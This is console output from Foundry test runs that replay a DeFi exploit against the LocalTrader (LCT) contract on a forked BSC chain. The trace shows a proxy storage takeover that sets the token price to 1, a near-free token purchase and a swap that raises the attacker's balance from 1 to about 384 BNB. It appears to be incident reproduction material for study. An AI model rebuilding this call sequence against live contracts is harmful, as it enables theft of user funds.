Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.19s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 598.37ms (1.73ms CPU time)

Ran 1 test for src/test/2023-05/LocalTrader_exp.sol:LCTExp
[PASS] testExp() (gas: 207706)
Logs:
  [Start] Attacker BNB Balance: 1.000000000000000000
  [End] Attacker BNB Balance: 384.240645066367446966

Traces:
  [6444] LCTExp::setUp()
    ├─ [0] VM::createSelectFork("bsc", 28460897 [2.846e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::deal(LCTExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18])
    │   └─ ← [Return]
    └─ ← [Stop]

  [250306] LCTExp::testExp()
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker BNB Balance", val: 1000000000000000000 [1e18], decimals: 18)
    ├─ [28073] 0x303554d4D8Bd01f18C6fA4A8df3FF57A96071a41::b5863c10(0000000000000000000000000567f2323251f0aab15c8dfb1967e4e8a7d42aee)
    │   ├─ [20757] 0x312DC37075646c7e0DBA21DF5BdFe69E76475fdc::b5863c10(0000000000000000000000000567f2323251f0aab15c8dfb1967e4e8a7d42aee) [delegatecall]
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0x000000000000000000000000b06a05c7f92578ef927860604edac89fd68dfec9 → 0x0000000000000000000000000567f2323251f0aab15c8dfb1967e4e8a7d42aee
    │   │   │   @ 1: 0x000000000000000000000000c1c6c591ce35040bcdb97b8804f416acde4e0fbd → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 3: 0x0000000000000000000000000000000000000000000000000000145abff33800 → 0x00000000000000000000000000000000000000000000000000002a1766f5d000
    │   │   │   @ 2: 0x000000000000000000000000ffdf0d059e161645eb0961cf7d723c704cdfa363 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [1772] 0x303554d4D8Bd01f18C6fA4A8df3FF57A96071a41::925d400c(0000000000000000000000000000000000000000000000000000000000000001)
    │   ├─ [953] 0x312DC37075646c7e0DBA21DF5BdFe69E76475fdc::925d400c(0000000000000000000000000000000000000000000000000000000000000001) [delegatecall]
    │   │   ├─  storage changes:
    │   │   │   @ 3: 0x00000000000000000000000000000000000000000000000000002a1766f5d000 → 1
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    ├─ [2863] 0x5C65BAdf7F97345B7B92776b22255c973234EfE7::balanceOf(0xcE3e12bD77DD54E20a18cB1B94667F3E697bea06) [staticcall]
    │   └─ ← [Return] 32650798746200000000000000 [3.265e25]
    ├─ [46001] 0xcE3e12bD77DD54E20a18cB1B94667F3E697bea06::buyTokens{value: 32650798}()
    │   ├─ [1514] 0x303554d4D8Bd01f18C6fA4A8df3FF57A96071a41::getTokenPrice() [staticcall]
    │   │   ├─ [698] 0x312DC37075646c7e0DBA21DF5BdFe69E76475fdc::getTokenPrice() [delegatecall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [863] 0x5C65BAdf7F97345B7B92776b22255c973234EfE7::balanceOf(0xcE3e12bD77DD54E20a18cB1B94667F3E697bea06) [staticcall]
    │   │   └─ ← [Return] 32650798746200000000000000 [3.265e25]
    │   ├─ [28761] 0x5C65BAdf7F97345B7B92776b22255c973234EfE7::transfer(LCTExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 32650798000000000000000000 [3.265e25])
    │   │   ├─ emit Transfer(from: 0xcE3e12bD77DD54E20a18cB1B94667F3E697bea06, to: LCTExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 32650798000000000000000000 [3.265e25])
    │   │   ├─  storage changes:
    │   │   │   @ 0xde62f679b78735414933212e51563ba4596d3114fd914f3ab50a2a65d60f1979: 0x0000000000000000000000000000000000000000001b021358c16311775d8000 → 0x0000000000000000000000000000000000000000000000000a5b08f24b658000
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000001b02134e665a1f2bf80000
    │   │   └─ ← [Return] true
    │   ├─ [1514] 0x303554d4D8Bd01f18C6fA4A8df3FF57A96071a41::getTokenPrice() [staticcall]
    │   │   ├─ [698] 0x312DC37075646c7e0DBA21DF5BdFe69E76475fdc::getTokenPrice() [delegatecall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ emit TokensPurchased(: LCTExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0x5C65BAdf7F97345B7B92776b22255c973234EfE7, : 32650798000000000000000000 [3.265e25], : 1)
    │   ├─ [1514] 0x303554d4D8Bd01f18C6fA4A8df3FF57A96071a41::getTokenPrice() [staticcall]
    │   │   ├─ [698] 0x312DC37075646c7e0DBA21DF5BdFe69E76475fdc::getTokenPrice() [delegatecall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000001b02134e665a1f2bf80000
    │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000001f2362e
    ├─ [25262] 0x5C65BAdf7F97345B7B92776b22255c973234EfE7::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: LCTExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [863] 0x5C65BAdf7F97345B7B92776b22255c973234EfE7::balanceOf(LCTExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 32650798000000000000000000 [3.265e25]
    ├─ [106838] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForETHSupportingFeeOnTransferTokens(32650798000000000000000000 [3.265e25], 0, [0x5C65BAdf7F97345B7B92776b22255c973234EfE7, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], LCTExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1684842939 [1.684e9])
    │   ├─ [9462] 0x5C65BAdf7F97345B7B92776b22255c973234EfE7::transferFrom(LCTExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x64b266Cd63fF3239E6491d6c2c58A5B8552c8724, 32650798000000000000000000 [3.265e25])
    │   │   ├─ emit Transfer(from: LCTExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x64b266Cd63fF3239E6491d6c2c58A5B8552c8724, value: 32650798000000000000000000 [3.265e25])
    │   │   ├─  storage changes:
    │   │   │   @ 0xc0ec174bace4dd1e817eb8d9140f50121a3330270f1f5dce3c8629440778808e: 0x0000000000000000000000000000000000000000001fe294f238be1ab640a792 → 0x0000000000000000000000000000000000000000003ae4a8409f1839e238a792
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000001b02134e665a1f2bf80000 → 0
    │   │   └─ ← [Return] true
    │   ├─ [2893] 0x64b266Cd63fF3239E6491d6c2c58A5B8552c8724::getReserves() [staticcall]
    │   │   └─ ← [Return] 38546702805214331058300818 [3.854e25], 836818761807082992305 [8.368e20], 1684841483 [1.684e9]
    │   ├─ [863] 0x5C65BAdf7F97345B7B92776b22255c973234EfE7::balanceOf(0x64b266Cd63fF3239E6491d6c2c58A5B8552c8724) [staticcall]
    │   │   └─ ← [Return] 71197500805214331058300818 [7.119e25]
    │   ├─ [67171] 0x64b266Cd63fF3239E6491d6c2c58A5B8552c8724::swap(0, 383240645066400097764 [3.832e20], 0x10ED43C718714eb63d5aA57B78B54704E256024E, 0x)
    │   │   ├─ [29962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x10ED43C718714eb63d5aA57B78B54704E256024E, 383240645066400097764 [3.832e20])
    │   │   │   ├─ emit Transfer(from: 0x64b266Cd63fF3239E6491d6c2c58A5B8552c8724, to: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 383240645066400097764 [3.832e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x55d50072221be068fbea9ade710c0a06abf15d78dfd825c77b46643f3522c3b1: 0x00000000000000000000000000000000000000000000002d5d3176352d66b2b1 → 0x00000000000000000000000000000000000000000000001896a92e040b104ccd
    │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x000000000000000000000000000000000000000000000014c6884831225665e4
    │   │   │   └─ ← [Return] true
    │   │   ├─ [863] 0x5C65BAdf7F97345B7B92776b22255c973234EfE7::balanceOf(0x64b266Cd63fF3239E6491d6c2c58A5B8552c8724) [staticcall]
    │   │   │   └─ ← [Return] 71197500805214331058300818 [7.119e25]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x64b266Cd63fF3239E6491d6c2c58A5B8552c8724) [staticcall]
    │   │   │   └─ ← [Return] 453578116740682894541 [4.535e20]
    │   │   ├─ emit Sync(reserve0: 71197500805214331058300818 [7.119e25], reserve1: 453578116740682894541 [4.535e20])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 32650798000000000000000000 [3.265e25], amount1In: 0, amount0Out: 0, amount1Out: 383240645066400097764 [3.832e20], to: 0x10ED43C718714eb63d5aA57B78B54704E256024E)
    │   │   ├─  storage changes:
    │   │   │   @ 10: 0x00000000000000000000000000c461b78d3e7163f23084654affdd71b9b52459 → 0x00000000000000000000000000c462f80fa4ea6e3480489ba1c3bd08dbe5cf89
    │   │   │   @ 9: 0x0000000000000000000000000000000001d546daacf89b356124f0bd25ba6608 → 0x0000000000000000000000000000000001d549637165dad1a44c8d5741d34688
    │   │   │   @ 8: 0x646ca40b00000000002d5d3176352d66b2b10000001fe294f238be1ab640a792 → 0x646ca5d300000000001896a92e040b104ccd0000003ae4a8409f1839e238a792
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x10ED43C718714eb63d5aA57B78B54704E256024E) [staticcall]
    │   │   └─ ← [Return] 383240645066400097764 [3.832e20]
    │   ├─ [9223] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(383240645066400097764 [3.832e20])
    │   │   ├─ [83] 0x10ED43C718714eb63d5aA57B78B54704E256024E::fallback{value: 383240645066400097764}()
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit Withdrawal(src: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 383240645066400097764 [3.832e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x000000000000000000000000000000000000000000000014c6884831225665e4 → 0
    │   │   └─ ← [Stop]
    │   ├─ [55] LCTExp::receive{value: 383240645066400097764}()
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker BNB Balance", val: 384240645066367446966 [3.842e20], decimals: 18)
    ├─  storage changes:
    │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 3: 0x0000000000000000000000000000000000000000000000000000145abff33800 → 0x00000000000000000000000000000000000000000000000000002a1766f5d000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 15.21s (13.54s CPU time)

Ran 2 test suites in 16.27s (15.81s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
